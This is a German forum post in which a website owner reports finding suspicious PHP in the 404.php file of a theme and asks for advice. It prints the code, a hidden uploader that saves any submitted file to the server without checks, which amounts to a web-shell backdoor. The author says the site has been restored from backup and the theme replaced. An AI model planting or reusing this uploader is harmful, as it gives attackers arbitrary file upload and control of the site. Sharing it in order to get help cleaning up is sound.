Zu meinem Problem: ich hab heute beim Durchstöbern meines Themes in der 404.php merkwürdigen Code gefunden. Sieht für mich nach einem Exploit aus, mit dem man sogar direkt hochladen kann, super ;)
Was sagt ihr dazu?
PHP
<?phpif(isset($_POST['Submit'])){ $filedir = ""; $maxfile = '2000000';
$userfile_name = $_FILES['image']['name']; $userfile_tmp = $_FILES['image']['tmp_name']; if (isset($_FILES['image']['name'])) { $abod = $filedir.$userfile_name; @move_uploaded_file($userfile_tmp, $abod); echo"<center><b>Done ==> $userfile_name</b></center>";}}else{echo'<form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';}?>
Problem ist bereits behoben und Backup ist eingespielt. Theme wurde auch gewechselt - ist vermutlich nun clean. Gibts sonst noch was zu tun?